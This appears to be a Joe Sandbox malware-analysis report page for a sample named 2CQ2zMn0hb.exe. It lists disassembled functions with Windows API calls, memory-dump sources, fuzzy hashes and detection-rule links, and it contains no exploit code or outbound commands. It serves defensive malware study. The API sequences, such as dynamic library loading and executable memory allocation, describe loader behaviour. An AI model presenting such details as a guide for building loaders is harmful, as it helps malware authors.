Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14

Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404394 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Function 6F97121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,6F97123B,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F971225

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 935e9c6045fd8f8298e5b7316ad210d84aad40df53d168516fea1fd779741c5a
Instruction ID: 7c60edbddf64525b1393e228b84151473e50d151813140302ba705d967793ac5
Opcode Fuzzy Hash: 935e9c6045fd8f8298e5b7316ad210d84aad40df53d168516fea1fd779741c5a
Instruction Fuzzy Hash: 2AB00271B48610DFFF409B6CCD46F3536D4F745715F444050F605D5185D66468248D75

Non-executed Functions

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

(7B, xrefs: 0040587D
{, xrefs: 004057F5

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00404850 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,Call), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 0040494D
A, xrefs: 00404973
Call, xrefs: 004049B1, 004049B6, 004049C1

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$Call
API String ID: 2624150263-413618503
Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 6F971B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6F97121B: GlobalAlloc.KERNELBASE(00000040,?,6F97123B,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F971225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6F971C6B
lstrcpyW.KERNEL32(00000008,?), ref: 6F971CB3
lstrcpyW.KERNEL32(00000808,?), ref: 6F971CBD
GlobalFree.KERNEL32(00000000), ref: 6F971CD0
GlobalFree.KERNEL32(?), ref: 6F971DB2
GlobalFree.KERNEL32(?), ref: 6F971DB7
GlobalFree.KERNEL32(?), ref: 6F971DBC
GlobalFree.KERNEL32(00000000), ref: 6F971FA6
lstrcpyW.KERNEL32(?,?), ref: 6F972140
GetModuleHandleW.KERNEL32(00000008), ref: 6F9721B5
LoadLibraryW.KERNEL32(00000008), ref: 6F9721C6
GetProcAddress.KERNEL32(?,?), ref: 6F972220
lstrlenW.KERNEL32(00000808), ref: 6F97223A

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 1dc0ad9673ab8240f1c97561122495be4a4167d2922c352c0885f5cac3d0ddd3
Instruction ID: aedc822dc0fa2a54c675ff50d89b279ae063246e167d6d2f3a3c027eebb99590
Opcode Fuzzy Hash: 1dc0ad9673ab8240f1c97561122495be4a4167d2922c352c0885f5cac3d0ddd3
Instruction Fuzzy Hash: 24227771D18706DBDB348FA889A46EAB7F8FF06315F10462AD1A5A62C0DB70E6C48F50

Function 00402104 Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A

Function 6F9726B8 Relevance: 1.3, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00000010,?,00000040,00001018,6F9724AA,00000000,?), ref: 6F9726E9

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 43f648b7f625e9aba8de20efc7c3d5cbff67546c1c5830bcab43641d2f463462
Instruction ID: 76ad9be5ec9dd2e8f497e3d20b9f98a5af8be88d01751a7969d7fedfbfd04df2
Opcode Fuzzy Hash: 43f648b7f625e9aba8de20efc7c3d5cbff67546c1c5830bcab43641d2f463462
Instruction Fuzzy Hash: BAF01470548B90CEEB658F3C8515B817BE0FB0A324F054698E1EA9B2D1D3B4B881CF50

Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

Call, xrefs: 004046FB
N, xrefs: 004046BA

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\2CQ2zMn0hb.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Strings

%ls=%ls, xrefs: 004060A9
[Rename], xrefs: 0040611D, 0040612F

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

